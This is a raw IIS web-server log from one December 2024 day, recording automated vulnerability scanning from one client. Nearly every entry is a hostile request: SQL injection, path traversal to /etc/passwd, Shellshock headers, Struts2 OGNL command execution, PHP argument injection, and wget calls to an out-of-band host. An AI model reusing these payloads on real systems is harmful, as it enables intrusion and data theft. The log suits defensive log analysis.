????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex241210.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-10 02:26:57 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-10 02:26:57 103.153.214.94 GET /servlet/codesettree flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.25 - 404 7 0 26 2024-12-10 02:26:57 103.153.214.94 POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.15 - 404 7 0 37 2024-12-10 02:26:58 103.153.214.94 GET /public/index.php s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 26 2024-12-10 02:26:58 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_16)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 22 2024-12-10 02:27:02 103.153.214.94 POST /dataSetParam/verification;swagger-ui/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 50 2024-12-10 02:27:02 103.153.214.94 POST /uapjs/jsinvoke/ action=invoke 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.15 - 404 7 0 23 2024-12-10 02:27:04 103.153.214.94 POST /index.php/User/doLogin - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.23 - 404 7 0 23 2024-12-10 02:27:06 103.153.214.94 POST /be9de4BKwTC3.jsp error=bsh.Interpreter 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 23 2024-12-10 02:27:08 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.22 - 404 7 0 27 2024-12-10 02:27:11 103.153.214.94 POST /bsh.servlet.BshServlet - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 23 2024-12-10 02:27:11 103.153.214.94 POST /mobile/plugin/browser.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 02:27:36 103.153.214.94 GET /upgrade/detail.jsp/login/LoginSSO.jsp id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 02:28:01 103.153.214.94 POST /zentao/user-login.html - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/zentao/user-login.html 404 7 0 41 2024-12-10 02:28:18 103.153.214.94 GET /vpn/user/download/client ostype=../../../../../../../../../etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.7+Safari/537.36 - 404 7 0 24 2024-12-10 02:28:19 103.153.214.94 GET /export/classroom-course-statistics fileNames[]=../../../../../../../etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 27 2024-12-10 02:30:12 103.153.214.94 GET /users/sign_in - 8172 - 115.146.123.211 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 7 0 24 2024-12-10 02:30:12 103.153.214.94 POST /index.php s=/home/page/uploadImg 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.16 - 404 7 0 32 2024-12-10 02:30:13 103.153.214.94 POST /cgi-bin/rpc - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 45 2024-12-10 02:30:29 103.153.214.94 POST /seeyon/htmlofficeservlet - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 26 2024-12-10 02:30:31 103.153.214.94 POST /general/index/UploadFile.php m=uploadPicture&uploadType=eoffice_logo&userId 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 02:30:33 103.153.214.94 GET /seeyon/test123456.jsp pwd=asasd3344&2q0Pici6ONAnJWrgl2xZEUBKkOj=ipconfig 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 02:30:35 103.153.214.94 GET /images/logo/logo-eoffice.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.20 - 404 7 0 35 2024-12-10 02:32:37 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 02:32:40 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_16)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 22 2024-12-10 02:36:40 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 29 2024-12-10 02:36:43 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 29 2024-12-10 02:37:24 103.153.214.94 POST /public/index.php/material/Material/_download_imgage media_id=1&picUrl=./../config/database.php 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.82+Safari/537.36 - 404 7 0 32 2024-12-10 02:37:27 103.153.214.94 GET /public/index.php/home/file/user_pics - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 24 2024-12-10 02:43:48 103.153.214.94 GET / lang=../../../../../usr/local/php/pearcmd 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.25 - 404 7 0 38 2024-12-10 02:43:52 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 41 2024-12-10 02:43:56 103.153.214.94 GET / +config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+rFg0csOuo4.log 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 404 7 0 22 2024-12-10 02:53:27 103.153.214.94 POST /cgibin/webproc - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4.11.12 - 404 7 0 27 2024-12-10 02:53:27 103.153.214.94 POST / q=node&destination=node 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 23 2024-12-10 02:53:27 103.153.214.94 POST /webadmin/auth/verification.php - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/start/ 404 7 0 25 2024-12-10 02:54:22 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 39 2024-12-10 02:57:31 103.153.214.94 POST /axis2-admin/login - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_6_6;+de)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.2+Safari/605.1.15 - 404 7 0 27 2024-12-10 02:57:31 103.153.214.94 POST /axis2/axis2-admin/login - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 24 2024-12-10 02:57:31 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 23 2024-12-10 02:57:31 103.153.214.94 POST /scripts/setup.php - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 24 2024-12-10 02:57:53 103.153.214.94 POST /index.php -d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 23 2024-12-10 02:58:41 103.153.214.94 GET / - 8172 - 35.203.211.239 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 260 2024-12-10 02:59:42 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 25 2024-12-10 02:59:49 103.153.214.94 POST /user.action - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Mobile/15E148+Safari/604.1 - 404 7 0 40 2024-12-10 03:00:05 103.153.214.94 GET /debug.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 24 2024-12-10 03:00:05 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 23 2024-12-10 03:00:05 103.153.214.94 GET /cgi-bin/test-cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 26 2024-12-10 03:00:05 103.153.214.94 GET /cgi-bin/stats - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/116.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 28 2024-12-10 03:00:05 103.153.214.94 GET /cgi-bin/status/status.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 24 2024-12-10 03:00:05 103.153.214.94 GET /cgi-bin/test - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 24 2024-12-10 03:00:05 103.153.214.94 GET /cgi-bin/status - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 24 2024-12-10 03:00:05 103.153.214.94 GET /test.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.41 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 24 2024-12-10 03:00:05 103.153.214.94 GET /cgi-bin/test.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 30 2024-12-10 03:02:11 103.153.214.94 GET /index.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 27 2024-12-10 03:02:11 103.153.214.94 GET /index.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 03:02:11 103.153.214.94 GET /login.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 26 2024-12-10 03:02:11 103.153.214.94 GET /index.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 24 2024-12-10 03:02:11 103.153.214.94 GET /login.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 26 2024-12-10 03:02:11 103.153.214.94 GET /index.action redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 24 2024-12-10 03:02:11 103.153.214.94 GET /index.action redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 24 2024-12-10 03:02:11 103.153.214.94 GET /index.action action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 03:02:11 103.153.214.94 GET /login.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.25 - 404 7 0 34 2024-12-10 03:03:57 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12.5)+AppleWebKit/617.19+(KHTML,+like+Gecko)+Version/17.6.47+Safari/617.19 - 404 7 0 25 2024-12-10 03:03:57 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 03:04:09 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 03:11:25 103.153.214.94 GET /backupmgt/localJob.php session=fail;wget+http://ctbq6epdf88k4t1c60lgdix186ozrf6hw.oast.pro; 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.22 - 404 7 0 30 2024-12-10 03:11:31 103.153.214.94 GET /backupmgt/pre_connect_check.php auth_name=fail;wget+http://ctbq6epdf88k4t1c60lgh7gzxburjwhdm.oast.pro; 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/98.0.4758.102+Safari/537.36 - 404 7 0 23 2024-12-10 03:12:29 103.153.214.94 GET / gf_page=upload 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 03:12:34 103.153.214.94 POST / gf_page=upload 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-10 03:14:58 103.153.214.94 POST /wp-content/plugins/wsecure/wsecure-config.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.19 - 404 7 0 28 2024-12-10 03:15:28 103.153.214.94 POST /website/blog/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 26 2024-12-10 03:15:32 103.153.214.94 POST /_search - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh+Intel+Mac+OS+X+10.15+rv:91.0)+Gecko/20100101+Firefox/91.0; - 404 7 0 24 2024-12-10 03:16:01 103.153.214.94 GET / author=1 8172 - 115.146.123.211 - - 404 7 0 22 2024-12-10 03:20:12 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.46 - 404 7 0 26 2024-12-10 03:21:25 103.153.214.94 POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 28 2024-12-10 03:22:08 103.153.214.94 GET /BSW_cxttongr.htm - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.1+Safari/605.1.15 - 404 7 0 27 2024-12-10 03:22:20 103.153.214.94 POST /RPC2 - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 03:23:53 103.153.214.94 POST /boardDataWW.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 26 2024-12-10 03:23:53 103.153.214.94 GET /index.action method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.20.13+(KHTML,+like+Gecko)+Version/17.7.74+Safari/616.20.13 - 404 7 0 28 2024-12-10 03:24:13 103.153.214.94 PUT /_users/org.couchdb.user:poc - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 400 0 0 41 2024-12-10 03:26:11 103.153.214.94 POST /javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 03:27:50 103.153.214.94 PUT /fileserver/2q0PiMuDJcRWusOYa4k4UqBi5nL.txt - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 03:27:52 103.153.214.94 GET /fileserver/2q0PiMuDJcRWusOYa4k4UqBi5nL.txt - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 03:29:11 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 7 0 29 2024-12-10 03:29:46 103.153.214.94 GET 